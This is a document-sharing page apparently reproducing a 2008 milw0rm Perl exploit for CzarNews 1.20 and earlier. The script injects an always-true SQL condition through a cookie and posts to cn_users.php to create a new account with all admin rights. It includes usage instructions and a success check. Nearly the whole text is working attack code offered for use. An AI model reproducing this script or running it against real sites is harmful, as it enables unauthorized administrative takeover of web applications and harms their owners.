CzarNews 1.20 Cookie Remote SQL Injection Exploit

Document Sample
CzarNews 1.20 Cookie Remote SQL Injection Exploit Powered By Docstoc
					                                 CzarNews 1.20 Cookie Remote SQL Injection Exploit   Page 1/2
  1    #!/usr/bin/perl
  2    # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  3    # CzarNews <= v1.20 (Cookie) Remote SQL Injection Exploit
  4    # Perl Exploit − Add a new admin with your credentials!
  5    # Discovered On: 15/09/2008
  6    # Discovered By: StAkeR − StAkeR[at]hotmail[dot]it
  7    # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  8    # Usage: perl http://localhost/cms StAkeR obscure
  9    # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  10
  11   use strict;
  12   use LWP::UserAgent;
  13
  14   my   $email = ’some@example.net’;
  15   my   ($hostname,$username,$password) = @ARGV;
  16   my   $request = undef;
  17   my   $http_s   = new LWP::UserAgent or die $!;
  18
  19   $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
  20   banner() unless $username and $password;
  21
  22   $http_s−>agent("Mozilla/4.5 [en] (Win95; U)");
  23   $http_s−>timeout(1);
  24   $http_s−>default_header(’Cookie’ => "recook=’ or ’1=1,’ or ’1=1");
  25
  26   $request = $http_s−>post($hostname."/cn_users.php",
  27                            [
  28                              user    => $username,
  29                              pass    => $password,
  30                              email   => $email,
  31                              allcats => "all",
  32                             admin    => "off",
  33                              news    => "on",
  34                             images => "on",
  35                             users    => "on",
  36                             categories => "on",
  37                             config => "on",
  38                             words => "on",
  39                             op => "add",
  40                             id => ’’,
  41                             go => "true",
  42                             submit => "Add+User"
  43                           ]);
  44
  45   if($request−>is_success)
  46   {
  47     if($request−>content =~ /has been added/i)
  48     {
  49       print "[+] Added New Administrator: $username & $password\n";
  50     }
  51     else
  52     {
StAkeR                                                                               09/15/2008
                                     CzarNews 1.20 Cookie Remote SQL Injection Exploit   Page 2/2
  53           print "[!] Exploit Failed!\n";
  54           print "[!] Site Not Vulnerable\n";
  55       }
  56   }
  57
  58
  59   sub banner
  60   {
  61     print "[+] CzarNews <= v1.20 Remote SQL Injection Exploit (add new admin)\n";
  62     print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
  63     return exit;
  64   }
  65
  66   # milw0rm.com [2008−09−15]




StAkeR                                                                                   09/15/2008